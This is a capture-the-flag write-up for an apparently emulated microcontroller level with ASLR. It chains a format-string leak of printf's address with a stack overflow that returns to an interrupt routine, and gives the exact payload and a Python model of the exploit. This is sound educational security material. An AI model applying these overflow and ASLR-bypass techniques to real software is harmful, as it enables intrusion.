This level introduces <rand> and <aslr_main> to implement ASLR.

We can immediately identify a stack buffer overflow in the Password: input. This grants us control of the PC (the saved return address).

Hex Input: 0102030405060708090a

pc: 0a09

Now that we have control of the PC, we need to trigger the 0x7f interrupt to solve the level.

We want to use <_INT> as we have control over 0x2(sp).

<_INT>:
mov	0x2(sp), r14
push	sr
mov	r14, r15
swpb	r15
mov	r15, sr
bis	#0x8000, sr
call	#0x10
pop	sr
ret

So the goal is to return to <_INT> with our 0x7f located at 0x2(sp).

However, this is problematic because the address of <_INT> is randomized, so we do not know what to overwrite the return address with.

Fortunately, we can obtain a leaked address through a format string bug in the Username: input, since the randomized address of <printf> is located on the stack.

We can read this value by providing Username: an input of %x%x.

A sample output:
Username (8 char max):
>>0000e1fe
Password:

Now that we have the address of <printf>, we can obtain the address of <_INT> by identifying the offset between the two functions.

That is 48ec (<_INT>) - 476a (<printf>) = 0x182, so <_INT> is located at <printf> + 0x182.

Our winning password input is 414141414141414180e341417f00, which returns to <_INT> and triggers the 0x7f unlock.
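As an added example (not part of the original writeup), the following Python decodes the leak and the password bytes above and models what <_INT> sees once the overwritten return address has been popped. It assumes the 8-byte distance to the saved return address shown by the pc: 0a09 probe, the 0x182 offset derived above, and function names of our own.

```python
# Added example, not code from the writeup. Decodes the Username leak,
# derives the randomized <_INT> address, and models the stack frame that
# <_INT> sees after the overwritten return address is popped.
import struct

INT_OFFSET = 0x182   # 48ec <_INT> - 476a <printf>, taken from the listing
RET_OFFSET = 8       # bytes 9-10 of the input land in pc (the "pc: 0a09" probe)
LEAK = ">>0000e1fe"  # constructed copy of the Username leak output above
PASSWORD = "414141414141414180e341417f00"   # the winning input from the writeup


def parse_leak(line: str) -> int:
    """Return the second %x value printed by the leak: <printf>'s address."""
    digits = line.lstrip(">")
    return int(digits[4:8], 16)


def int_address(printf_addr: int) -> int:
    """<_INT> sits at a fixed distance from <printf>, ASLR or not."""
    return (printf_addr + INT_OFFSET) & 0xFFFF


def frame_after_ret(password_hex: str) -> dict:
    """Model the stack once main's ret has popped the overwritten return word."""
    data = bytes.fromhex(password_hex)
    pc = struct.unpack_from("<H", data, RET_OFFSET)[0]        # popped into pc
    sp = RET_OFFSET + 2                                       # ret consumed one word
    sp_word = struct.unpack_from("<H", data, sp)[0]           # 0x0(sp), unused padding
    int_arg = struct.unpack_from("<H", data, sp + 2)[0]       # 0x2(sp) -> r14 in <_INT>
    # <_INT>: swpb moves the low byte into the high byte of sr, bis sets 0x8000;
    # the gate at 0x10 then reads the interrupt number from bits 8-14 of sr.
    sr = ((int_arg & 0xFF) << 8) | 0x8000
    return {
        "pc": pc,
        "sp_word": sp_word,
        "int_arg": int_arg,
        "sr": sr,
        "interrupt": (sr >> 8) & 0x7F,
    }


if __name__ == "__main__":
    printf_addr = parse_leak(LEAK)
    print(f"<printf> = {printf_addr:04x}, <_INT> = {int_address(printf_addr):04x}")
    print(frame_after_ret(PASSWORD))
```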